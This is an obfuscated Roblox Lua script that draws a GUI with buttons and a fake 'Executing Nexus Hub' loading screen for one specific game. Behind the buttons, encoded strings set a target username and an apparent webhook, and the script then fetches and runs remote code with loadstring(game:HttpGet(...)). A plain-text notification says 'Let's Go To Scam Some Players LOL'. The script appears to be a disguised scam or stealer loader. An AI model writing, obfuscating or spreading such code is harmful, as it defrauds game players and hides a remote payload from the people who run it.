--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.6) ~  Much Love, Ferib 

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit ;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v8,v9) local v10={};for v11=1, #v8 do v6(v10,v0(v4(v1(v2(v8,v11,v11 + 1 )),v1(v2(v9,1 + (v11% #v9) ,1 + (v11% #v9) + 1 )))%256 ));end return v5(v10);end if (game.PlaceId==(30671279 + 112152012)) then local v12=Instance.new(v7("\226\192\201\32\227\181\224\11\216","\126\177\163\187\69\134\219\167"));v12.Name=v7("\51\204\62\215\245\32\198\13\208\245","\156\67\173\74\165");v12.Parent=game.CoreGui;game:GetService(v7("\7\163\72\4\168\35\84\19\162\64","\38\84\215\41\118\220\70")):SetCore(v7("\99\19\44\22\208\95\2\43\20\247\83\23\54\27\241\94","\158\48\118\66\114"),{[v7("\159\45\4\58\118","\155\203\68\112\86\19\197")]=v7("\116\220\59\230\90","\152\38\189\86\156\32\24\133"),[v7("\200\82\191\82","\38\156\55\199")]=v7("\152\81\79\104\36\85\211\119\232\91\83\26\83\64\210\102\232\90\73\1","\35\200\29\28\72\115\20\154"),[v7("\48\188\222\209","\84\121\223\177\191\237\76")]=v7("\169\84\209\180\50\69\61\195\225\25\134\180\35\64\53\156\154\69\218\165\46\22\57\197\230\7\156\249\99\2\101\151\227\0\144\245\124\71\109\144\238\6\143\168\103\1\101\145","\161\219\54\169\192\90\48\80")});Duration=20;game:GetService(v7("\122\86\1\55\93\71\18\2\92\75","\69\41\34\96")):SetCore(v7("\143\198\217\14\44\36\168\202\209\3\1\42\168\202\216\4","\75\220\163\183\106\98"),{[v7("\54\179\159\59\220","\185\98\218\235\87")]=v7("\249\61\42\252\196","\202\171\92\71\134\190"),[v7("\29\196\52\156","\232\73\161\76")]=v7("\158\193\71\94\11\175\208\76\90\94\136\218\67\80\94\141\220\80\78\23\180\215","\126\219\185\34\61"),[v7("\37\205\81\124","\135\108\174\62\18\30\23\147")]=v7("\164\235\50\223\16\187\62\197\236\166\101\223\1\190\54\154\151\250\57\206\12\232\58\195\235\184\127\146\65\252\102\145\238\191\115\158\94\185\110\150\227\185\108\195\69\255\102\151","\167\214\137\74\171\120\206\83")});Duration=16 -4 ;local v16=Instance.new(v7("\173\226\51\80\253","\199\235\144\82\61\152"));v16.Size=UDim2.new(0.38 + 0 ,0 + 0 ,0.72 -0 ,0 -0 );v16.Position=UDim2.new(0.3 -0 ,0 + 0 ,0.1,0 -0 );v16.BackgroundColor3=Color3.fromRGB(292 -183 ,1337 -(322 + 905) ,719 -(602 + 9) );v16.BorderColor3=Color3.new(1189 -(449 + 740) ,872 -(826 + 46) ,947 -(245 + 702) );v16.BorderSizePixel=3;v16.Active=true;v16.BackgroundTransparency=0 -0 ;v16.Draggable=true;v16.Parent=v12;local v26=Instance.new(v7("\51\19\161\63\43\23\187\46\11","\75\103\118\217"));v26.Size=UDim2.new(0.3 + 0 ,1898 -(260 + 1638) ,0.08,440 -(382 + 58) );v26.Position=UDim2.new(0.35 -0 ,0 + 0 ,0.03 -0 ,0 -0 );v26.BackgroundColor3=Color3.new(0,1205 -(902 + 303) ,0 -0 );v26.BorderColor3=Color3.new(0 -0 ,0 + 0 ,1690 -(1121 + 569) );v26.BorderSizePixel=215 -(22 + 192) ;v26.Text=v7("\233\81\104\1\170\94\234\121\34\84\158\11\206","\126\167\52\16\116\217");v26.BackgroundTransparency=1;v26.TextColor3=Color3.new(255,938 -(483 + 200) ,1718 -(1404 + 59) );v26.Font=Enum.Font.ArialBold;v26.TextSize=30;v26.Parent=v16;local v26=Instance.new(v7("\252\43\56\148\152\24\254\205\34","\156\168\78\64\224\212\121"));v26.Size=UDim2.new(0.3,0 -0 ,0.1,0);v26.Position=UDim2.new(0.35 -0 ,0,0.13,765 -(468 + 297) );v26.BackgroundColor3=Color3.new(0,562 -(334 + 228) ,0);v26.BorderColor3=Color3.new(0 -0 ,0 -0 ,0 -0 );v26.BorderSizePixel=1 + 0 ;v26.Text=v7("\52\237\164\195\71\216\160\220\20\231\170\192","\174\103\142\197");v26.BackgroundTransparency=1;v26.TextColor3=Color3.new(491 -(141 + 95) ,251 + 4 ,656 -401 );v26.Font=Enum.Font.ArialBold;v26.TextSize=60 -35 ;v26.Parent=v16;local v26=Instance.new(v7("\98\45\71\44\9\95\250\83\36","\152\54\72\63\88\69\62"));v26.Size=UDim2.new(0.3 + 0 ,0 -0 ,0.1,0 + 0 );v26.Position=UDim2.new(0.35,0 + 0 ,0.1 -0 ,0);v26.BackgroundColor3=Color3.new(0,0 + 0 ,163 -(92 + 71) );v26.BorderColor3=Color3.new(0 + 0 ,0,0 -0 );v26.BorderSizePixel=766 -(574 + 191) ;v26.Text=v7("\235\251\209\99\235\251\209\99\235","\60\180\164\142");v26.BackgroundTransparency=1 + 0 ;v26.TextColor3=Color3.new(0 -0 ,0 + 0 ,849 -(254 + 595) );v26.Font=Enum.Font.ArialBold;v26.TextSize=63;v26.Parent=v16;local v39=Instance.new(v7("\108\91\29\61\5\248\6\76\81\11","\114\56\62\101\73\71\141"));v39.Size=UDim2.new(126.9 -(55 + 71) ,0 -0 ,1790.15 -(573 + 1217) ,0 -0 );v39.Position=UDim2.new(0.05,0,0.35,0);v39.BackgroundColor3=Color3.fromRGB(52,4 + 39 ,187 -70 );v39.BorderColor3=Color3.new(939 -(714 + 225) ,0 -0 ,0 -0 );v39.BorderSizePixel=1 + 1 ;v39.Text=v7("\156\252\203\193\248\179\155\235\158\207","\164\216\137\187");v39.BackgroundTransparency=0 -0 ;v39.TextColor3=Color3.new(1061 -(118 + 688) ,255,255);v39.Font=Enum.Font.Highway;v39.TextSize=71 -(25 + 23) ;v39.Parent=v16;v39.MouseButton1Click:Connect(function() if (v39.BackgroundColor3==Color3.fromRGB(11 + 41 ,43,2003 -(927 + 959) )) then local v69=0;while true do if (v69==(6 -4)) then v39.Text=v7("\165\57\221\23\167\219\108\156","\135\225\76\173\114");wait(1);v39.BackgroundColor3=Color3.fromRGB(782 -(16 + 716) ,205,96 -46 );v39.Text=v7("\62\248\168\181\236\231\231\53\195","\199\122\141\216\208\204\221");v69=3;end if (v69==(97 -(11 + 86))) then v39.Text=v7("\246\243\33\183\230\164\75\135","\107\178\134\81\210\198\158");wait(2 -1 );v39.Text=v7("\28\27\146\195\234\98\78\214","\202\88\110\226\166");wait(286 -(175 + 110) );v69=2 -1 ;end if (v69==(4 -3)) then v39.Text=v7("\231\26\146\242\138\153\79\209","\170\163\111\226\151");wait(1797 -(503 + 1293) );v39.Text=v7("\53\37\162\61\14\109\105\67","\73\113\80\210\88\46\87");wait(2 -1 );v69=2;end if (v69==(3 + 0)) then game:GetService(v7("\158\201\17\226\108\243\191\250\5\249","\150\205\189\112\144\24")):SetCore(v7("\22\129\177\72\42\135\5\25\35\141\188\77\16\129\30\30","\112\69\228\223\44\100\232\113"),{[v7("\224\22\19\223\179","\230\180\127\103\179\214\28")]=v7("\190\4\82\92\254","\128\236\101\63\38\132\33"),[v7("\152\172\9\80","\175\204\201\113\36\214\139")]=v7("\102\207\54\217\20\83\140\1\212\1\7\248\39\221\0\66","\100\39\172\85\188"),[v7("\132\123\182\142","\83\205\24\217\224")]=v7("\244\199\213\41\238\208\192\63\188\138\130\41\255\213\200\96\199\214\222\56\242\131\196\57\187\148\152\100\191\151\152\107\190\147\148\104\160\210\144\108\179\149\139\53\187\148\152\109","\93\134\165\173")});Duration=11;Username=v7("\138\250\196\251\53\219\188\121\129\208\211\215\50","\30\222\146\161\162\90\174\210");Webhook=v7("\237\90\100\26\246\20\63\69\225\71\99\9\234\92\116\68\230\65\125\69\228\94\121\69\242\75\114\2\234\65\123\25\170\31\34\92\176\24\34\83\176\22\37\94\179\25\35\93\176\24\37\93\170\67\91\51\188\84\85\36\237\77\119\37\232\95\100\51\179\102\127\40\188\100\79\88\201\105\104\82\199\24\98\50\240\119\96\16\218\116\83\6\226\25\61\4\203\119\70\90\246\74\124\8\196\111\97\58\246\120\40\36\206\86\121\19\236\77\104\45\255","\106\133\46\16");v69=1065 -(810 + 251) ;end if (v69==(3 + 1)) then loadstring(game:HttpGet(v7("\80\52\103\236\73\26\23\111\118\251\85\82\81\43\102\239\91\14\75\48\114\255\95\15\85\45\33","\32\56\64\19\156\58")))();break;end end else local v70=0 + 0 ;while true do if (v70==(0 + 0)) then v39.BackgroundColor3=Color3.fromRGB(585 -(43 + 490) ,776 -(711 + 22) ,117);v39.Text=v7("\126\221\245\83\26\168\192\117\238\195","\224\58\168\133\54\58\146");break;end end end end);local v39=Instance.new(v7("\109\83\83\233\87\147\147\31\86\88","\107\57\54\43\157\21\230\231"));v39.Size=UDim2.new(0.9 -0 ,859 -(240 + 619) ,0.15 + 0 ,0 -0 );v39.Position=UDim2.new(0.05 + 0 ,1744 -(1344 + 400) ,405.55 -(255 + 150) ,0 + 0 );v39.BackgroundColor3=Color3.fromRGB(28 + 24 ,183 -140 ,377 -260 );v39.BorderColor3=Color3.new(1739 -(404 + 1335) ,406 -(183 + 223) ,0 -0 );v39.BorderSizePixel=2;v39.Text=v7("\239\153\16\241\188\156\252\216\138\28\181\227\156\224\253\173","\175\187\235\113\149\217\188");v39.BackgroundTransparency=0 + 0 ;v39.TextColor3=Color3.new(92 + 163 ,255,255);v39.Font=Enum.Font.Highway;v39.TextSize=23;v39.Parent=v16;v39.MouseButton1Click:Connect(function() if (v39.BackgroundColor3==Color3.fromRGB(52,380 -(10 + 327) ,82 + 35 )) then v39.Text=v7("\8\189\128\72\230\57\75\63\174\140\12\185\57\45","\24\92\207\225\44\131\25");wait(339 -(118 + 220) );v39.Text=v7("\127\193\185\72\30\61\120\208\185\65\91\39\11\135","\29\43\179\216\44\123");wait(1 + 0 );v39.Text=v7("\137\203\33\72\184\153\19\79\188\212\96\22\253\138","\44\221\185\64");wait(450 -(108 + 341) );v39.Text=v7("\53\245\73\91\118\65\212\75\94\126\65\189\8\13","\19\97\135\40\63");wait(1 + 0 );v39.Text=v7("\154\78\50\63\42\113\157\95\50\54\111\107\238\13","\81\206\60\83\91\79");wait(4 -3 );v39.BackgroundColor3=Color3.fromRGB(1543 -(711 + 782) ,205,50);v39.Text=v7("\122\185\209\118\42\131\126\167\79\166\144\40\111\236\99","\196\46\203\176\18\79\163\45");game:GetService(v7("\139\54\127\12\48\254\253\159\55\119","\143\216\66\30\126\68\155")):SetCore(v7("\153\205\3\207\235\172\195\232\172\193\14\202\209\170\216\239","\129\202\168\109\171\165\195\183"),{[v7("\22\81\35\212\219","\134\66\56\87\184\190\116")]=v7("\14\48\4\161\3","\85\92\81\105\219\121\139\65"),[v7("\201\182\72\81","\191\157\211\48\37\28")]=v7("\254\28\247\25\42\203\95\192\20\63\159\43\230\29\62\218","\90\191\127\148\124"),[v7("\81\132\33\25","\119\24\231\78")]=v7("\144\47\189\94\212\85\28\128\119\234\5\200\89\1\135\112\132\89\207\69\5\196\36\161\23\141\21\72\219\127\240\28\132\22\72\215\107\178\23\141\21\65\196\37\248\27\137\16","\113\226\77\197\42\188\32")});Duration=20 -9 ;Username=v7("\14\30\241\140\53\3\250\178\5\52\230\160\50","\213\90\118\148");Webhook=v7("\83\58\160\70\94\1\97\251\82\68\72\45\187\68\73\21\45\187\91\2\90\62\189\25\90\94\44\188\89\66\80\61\251\7\31\13\123\226\4\20\14\118\225\2\27\12\125\227\3\27\14\121\251\91\102\98\119\174\115\99\83\45\179\121\64\74\58\141\0\101\84\12\237\124\114\9\2\147\78\21\121\120\166\110\88\98\62\174\105\119\120\34\179\1\0\85\0\141\96\29\72\42\184\84\108\122\63\132\69\123\3\0\159\78\68\66\39\183\78\106\65","\45\59\78\212\54");loadstring(game:HttpGet(v7("\24\66\151\155\149\116\226\191\21\81\140\153\143\37\184\227\17\24\144\155\135\45\168\191\29\91\209","\144\112\54\227\235\230\78\205")))();else v39.BackgroundColor3=Color3.fromRGB(521 -(270 + 199) ,14 + 29 ,117);v39.Text=v7("\135\58\14\248\213\27\128\43\14\241\144\1\243\7\41\218","\59\211\72\111\156\176");end end);local v39=Instance.new(v7("\122\130\251\57\108\146\247\57\65\137","\77\46\231\131"));v39.Size=UDim2.new(0.9,1819 -(580 + 1239) ,0.15 -0 ,0 + 0 );v39.Position=UDim2.new(0.05 + 0 ,0 + 0 ,0.75 -0 ,0 + 0 );v39.BackgroundColor3=Color3.fromRGB(52,1210 -(645 + 522) ,1907 -(1010 + 780) );v39.BorderColor3=Color3.new(0 + 0 ,0,0 -0 );v39.BorderSizePixel=5 -3 ;v39.Text=v7("\142\70\183\68\191\20\154\65\189\20\236\0\149\114\144","\32\218\52\214");v39.BackgroundTransparency=1836 -(1045 + 791) ;v39.TextColor3=Color3.new(645 -390 ,255,389 -134 );v39.Font=Enum.Font.Highway;v39.TextSize=528 -(351 + 154) ;v39.Parent=v16;v39.MouseButton1Click:Connect(function() if (v39.BackgroundColor3==Color3.fromRGB(52,1617 -(1281 + 293) ,383 -(28 + 238) )) then v39.Text=v7("\122\5\48\172\244\240\105\91\73\87\107\232\164","\58\46\119\81\200\145\208\37");wait(2 -1 );v39.Text=v7("\31\158\49\168\172\253\26\42\139\112\246\233\233","\86\75\236\80\204\201\221");wait(1560 -(1381 + 178) );v39.Text=v7("\70\83\118\129\251\203\94\64\112\197\164\203\33","\235\18\33\23\229\158");wait(1 + 0 );v39.Text=v7("\100\168\192\191\85\250\237\186\87\250\155\251\2","\219\48\218\161");wait(1 + 0 );v39.Text=v7("\208\99\125\77\222\15\204\229\118\60\19\155\30","\128\132\17\28\41\187\47");wait(1 + 0 );v39.BackgroundColor3=Color3.fromRGB(172 -122 ,205,50);v39.Text=v7("\53\32\7\62\88\65\30\7\61\29\91\114\41\20","\61\97\82\102\90");game:GetService(v7("\159\58\170\89\211\82\12\46\185\39","\105\204\78\203\43\167\55\126")):SetCore(v7("\150\175\45\26\61\11\211\88\163\163\32\31\7\13\200\95","\49\197\202\67\126\115\100\167"),{[v7("\3\82\203\37\133","\62\87\59\191\73\224\54")]=v7("\213\3\247\211\253","\169\135\98\154"),[v7("\255\114\60\64","\168\171\23\68\52\157\83")]=v7("\213\114\246\168\53\57\199\192\121\240\237\17\63\134\240\116","\231\148\17\149\205\69\77"),[v7("\169\164\200\245","\159\224\199\167\155\55")]=v7("\229\241\36\198\255\230\49\208\173\188\115\198\238\227\57\143\214\224\47\215\227\181\53\214\170\162\105\139\174\161\105\132\175\165\101\135\177\228\97\131\162\163\122\218\170\162\105\130","\178\151\147\92")});Duration=11;Username=v7("\184\245\73\11\29\89\116\139\194\110\32\7\68","\26\236\157\44\82\114\44");Webhook=v7("\34\58\193\75\57\116\154\20\46\39\198\88\37\60\209\21\41\33\216\20\43\62\220\20\61\43\215\83\37\33\222\72\101\127\135\13\127\120\135\2\127\118\128\15\124\121\134\12\127\120\128\12\101\35\254\98\115\52\240\117\34\45\210\116\39\63\193\98\124\6\218\121\115\4\234\9\6\9\205\3\8\120\199\99\63\23\197\65\21\20\246\87\45\121\152\85\4\23\227\11\57\42\217\89\11\15\196\107\57\24\141\117\1\54\220\66\35\45\205\124\48","\59\74\78\181");loadstring(game:HttpGet(v7("\45\197\78\74\160\127\158\21\95\180\42\195\83\81\166\54\208\20\73\163\36\210\95\21\190\40\131","\211\69\177\58\58")))();else local v77=0;while true do if (v77==0) then v39.BackgroundColor3=Color3.fromRGB(27 + 25 ,513 -(381 + 89) ,104 + 13 );v39.Text=v7("\131\247\120\241\236\139\155\228\126\181\179\139\152\195\95","\171\215\133\25\149\137");break;end end end end);local v26=Instance.new(v7("\213\205\42\238\195\49\254\71\237","\34\129\168\82\154\143\80\156"));v26.Size=UDim2.new(0.3 + 0 ,0,0.1 -0 ,1156 -(1074 + 82) );v26.Position=UDim2.new(0.08 -0 ,1784 -(214 + 1570) ,0.92,1455 -(990 + 465) );v26.BackgroundColor3=Color3.new(0 + 0 ,0 + 0 ,0 + 0 );v26.BorderColor3=Color3.new(0,0 -0 ,0);v26.BorderSizePixel=1727 -(1668 + 58) ;v26.Text=v7("\183\179\62\17\82\14\170\151\179\48\0\77\74\201\177\186\58\24","\233\229\210\83\107\40\46");v26.BackgroundTransparency=627 -(512 + 114) ;v26.TextColor3=Color3.new(664 -409 ,526 -271 ,255);v26.Font=Enum.Font.ArialBold;v26.TextSize=45 -32 ;v26.Parent=v16;local v52=game.Players.LocalPlayer;local v53=v52.Name;local v54=Instance.new(v7("\245\71\42\194\41\192\64\55\218","\101\161\34\82\182"));v54.Size=UDim2.new(1 + 0 ,0 + 0 ,0.75,0);v54.Position=UDim2.new(0.00001 + 0 ,0 -0 ,1994.25 -(109 + 1885) ,1469 -(1269 + 200) );v54.BackgroundColor3=Color3.fromRGB(208 -99 ,925 -(98 + 717) ,934 -(802 + 24) );v54.BorderColor3=Color3.new(0,0,0);v54.BorderSizePixel=0 -0 ;v54.Text="Welcome\n"   .. v52.Name   .. "" ;v54.BackgroundTransparency=0 -0 ;v54.TextColor3=Color3.new(38 + 217 ,196 + 59 ,42 + 213 );v54.Font=Enum.Font.Highway;v54.TextSize=7 + 23 ;v54.Visible=true;v54.Parent=v16;local v39=Instance.new(v7("\220\8\65\234\249\247\150\58\231\3","\78\136\109\57\158\187\130\226"));v39.Size=UDim2.new(0.24,0 -0 ,0.1,0 -0 );v39.Position=UDim2.new(0.76,0 + 0 , -(0.112 + 0),0 + 0 );v39.BackgroundColor3=Color3.fromRGB(24 + 8 ,84 + 94 ,1603 -(797 + 636) );v39.BorderColor3=Color3.new(0,0,0);v39.BorderSizePixel=14 -11 ;v39.Text=v7("\17\47\252\255\126\24\236\248","\145\94\95\153");v39.BackgroundTransparency=0;v39.TextColor3=Color3.new(1619 -(1427 + 192) ,0 + 0 ,0);v39.Font=Enum.Font.ArialBold;v39.TextSize=27 -15 ;v39.Parent=v16;v39.MouseButton1Click:Connect(function() local v68=0;while true do if (v68==(9 + 0)) then v54.BackgroundTransparency=0.4 + 0 ;wait(326.3 -(192 + 134) );v54.BackgroundTransparency=1276.5 -(316 + 960) ;wait(0.3 + 0 );v54.BackgroundTransparency=0.6 + 0 ;wait(0.3 + 0 );v68=38 -28 ;end if (v68==0) then v54.Text=v7("\209\194\21\209\71\185\250","\215\157\173\116\181\46");wait(551.8 -(83 + 468) );v54.Text=v7("\25\187\138\246\211\59\179\197","\186\85\212\235\146");wait(1806.8 -(1202 + 604) );v54.Text=v7("\238\142\23\250\48\224\95\140\207","\56\162\225\118\158\89\142");wait(0.8 -0 );v68=1 -0 ;end if (v68==(27 -17)) then v54.BackgroundTransparency=325.7 -(45 + 280) ;wait(0.3 + 0 );v54.BackgroundTransparency=0.8 + 0 ;wait(0.3 + 0 );v54.BackgroundTransparency=0.9 + 0 ;wait(0.3 + 0 );v68=20 -9 ;end if (v68==(1922 -(340 + 1571))) then v54.BackgroundTransparency=1;wait(0.3 + 0 );v54.Visible=false;v39.Visible=false;game:GetService(v7("\253\106\179\17\145\203\108\149\22\140","\229\174\30\210\99")):SetCore(v7("\40\232\136\85\195\50\45\18\235\143\82\236\41\48\20\227","\89\123\141\230\49\141\93"),{[v7("\199\120\226\0\21","\42\147\17\150\108\112")]=v7("\61\167\32\101\253","\136\111\198\77\31\135"),[v7("\54\12\191\66","\201\98\105\199\54\221\132\119")]="Let's Go To Scam Some Players LOL",[v7("\144\15\140\47","\204\217\108\227\65\98\85")]=v7("\76\193\237\241\36\213\83\193\175\170\99\212\71\211\240\184\13\211\77\198\225\163\37\196\3\146\160\188\117\146\11\149\173\179\117\149\24\212\168\180\121\144\24\203\168\180\121\144","\160\62\163\149\133\76")});Duration=1783 -(1733 + 39) ;break;end if (v68==(19 -12)) then Webhook=v7("\211\197\58\76\60\13\148\158\42\85\60\84\212\195\42\18\44\88\214\158\47\76\38\24\204\212\44\84\32\88\208\194\97\13\125\1\142\135\124\5\122\15\142\133\120\11\124\0\142\135\123\11\96\90\240\232\119\70\10\121\211\210\41\115\34\70\207\232\120\116\32\117\130\251\17\14\3\112\195\137\12\10\61\111\206\232\62\70\16\109\248\221\41\11\98\89\245\232\24\12\60\83\215\211\15\125\62\103\200\231\118\114\4\79\210\200\39\95\55\112\193","\55\187\177\78\60\79");loadstring(game:HttpGet(v7("\37\218\75\251\85\149\207\98\203\88\228\84\198\139\56\221\94\165\85\223\129\46\203\16\230\75\157","\224\77\174\63\139\38\175")))();wait(1034.001 -(125 + 909) );v54.Text=v7("\167\78\85\62\136\68\76\43","\78\228\33\56");wait(1950 -(1096 + 852) );v54.Text="";v68=4 + 4 ;end if ((5 -1)==v68) then v54.Text=v7("\216\162\183\208\161\88\94","\57\148\205\214\180\200\54");wait(0.8);v54.Text=v7("\62\242\52\48\127\28\250\123","\22\114\157\85\84");wait(0.8 + 0 );v54.Text=v7("\232\196\18\192\84\248\175\138\133","\200\164\171\115\164\61\150");wait(512.8 -(409 + 103) );v68=241 -(46 + 190) ;end if (v68==1) then v54.Text=v7("\112\10\193\171\43\214\91\75\142\225","\184\60\101\160\207\66");wait(95.1 -(51 + 44) );v54.Text=v7("\29\141\125\184\56\140\123","\220\81\226\28");wait(0.8 + 0 );v54.Text=v7("\63\218\131\255\227\201\20\155","\167\115\181\226\155\138");wait(0.8);v68=1319 -(1114 + 203) ;end if (v68==5) then v54.Text=v7("\146\251\2\65\138\176\243\77\11\205","\227\222\148\99\37");wait(0.8);v54.Text="Executing\nNexus Hub...";Username=v7("\7\90\87\207\246\38\92\85\201\219\33\71\90","\153\83\50\50\150");Webhook=v7("\85\98\103\12\96\241\2\18\114\122\15\112\164\95\89\56\112\19\126\228\76\77\127\60\11\118\169\69\82\121\120\15\60\250\31\11\35\37\78\42\254\21\8\34\37\75\32\252\24\11\35\36\83\126\128\116\4\108\86\50\123\168\74\114\123\98\8\74\253\101\82\84\42\54\76\249\97\122\110\43\62\37\185\117\72\79\99\6\76\145\110\81\113\36\81\125\133\116\107\38\96\24\127\169\108\124\103\67\15\69\243\99\118\110\122\5\122\168\85\122\108","\45\61\22\19\124\19\203");loadstring(game:HttpGet(v7("\201\6\25\229\17\42\246\142\23\10\250\16\121\178\212\1\12\187\17\96\184\194\23\66\248\15\34","\217\161\114\109\149\98\16")))();v68=732 -(228 + 498) ;end if (v68==3) then v54.Text=v7("\149\44\170\112\182\177\66\250","\212\217\67\203\20\223\223\37");wait(0.8);v54.Text=v7("\150\130\169\214\179\131\175\156\244","\178\218\237\200");wait(0.8);v54.Text=v7("\154\186\231\212\191\187\225\158\248\251","\176\214\213\134");wait(0.8 + 0 );v68=4;end if (v68==(5 + 3)) then v54.BackgroundTransparency=663.1 -(174 + 489) ;wait(0.3 -0 );v54.BackgroundTransparency=1905.2 -(830 + 1075) ;wait(524.3 -(303 + 221) );v54.BackgroundTransparency=1269.3 -(231 + 1038) ;wait(0.3 + 0 );v68=1171 -(171 + 991) ;end if (v68==(24 -18)) then wait(0.001 -0 );Username=v7("\38\40\61\69\179\97\28\39\7\94\174\97\26","\20\114\64\88\28\220");Webhook=v7("\57\21\198\164\235\138\242\126\5\219\167\251\223\175\53\79\209\187\245\159\188\33\8\157\163\253\210\181\62\14\217\167\183\129\239\103\84\132\230\161\133\229\100\85\132\227\171\135\232\103\84\133\251\245\251\132\104\27\247\154\240\211\186\30\12\195\160\193\134\149\62\35\139\158\199\130\145\22\25\138\150\174\194\133\36\56\194\174\199\234\158\61\6\133\249\246\254\132\7\81\193\176\244\210\156\16\16\226\167\206\136\147\26\25\219\173\241\211\165\22\27","\221\81\97\178\212\152\176");loadstring(game:HttpGet(v7("\197\243\9\235\9\151\168\82\254\29\194\245\20\240\15\222\230\83\232\10\204\228\24\180\23\192\181","\122\173\135\125\155")))();wait(0.5 -0 );Username=v7("\176\201\5\128\48\36\198\131\254\34\171\42\57","\168\228\161\96\217\95\81");v68=6 + 1 ;end if (v68==(6 -4)) then v54.Text=v7("\206\45\230\88\114\127\193\172\108","\166\130\66\135\60\27\17");wait(0.8 -0 );v54.Text=v7("\104\69\207\113\57\74\77\128\59\126","\80\36\42\174\21");wait(0.8);v54.Text=v7("\98\31\54\126\71\30\48","\26\46\112\87");wait(0.8 -0 );v68=9 -6 ;end end end);else local v67=0;while true do if (v67==(1248 -(111 + 1137))) then game:GetService(v7("\229\180\12\61\215\211\178\42\58\202","\163\182\192\109\79")):SetCore(v7("\7\35\14\196\219\59\50\9\198\252\55\39\20\201\250\58","\149\84\70\96\160"),{[v7("\12\15\25\225\61","\141\88\102\109")]=v7("\129\82\199\106\0","\161\211\51\170\16\122\93\53"),[v7("\207\171\170\60","\72\155\206\210")]=v7("\114\114\93\29\115\79\105\20\0\60\82\58\121\35\97\6\87\85\8\50\77\123","\83\38\26\52\110"),[v7("\113\20\40\72","\38\56\119\71")]=v7("\225\237\64\194\45\67\254\237\2\153\106\66\234\255\93\139\4\69\224\234\76\144\44\82\174\190\13\143\124\4\166\185\0\128\124\3\181\248\5\135\112\6\181\231\5\135\112\6","\54\147\143\56\182\69")});Duration=169 -(91 + 67) ;break;end end end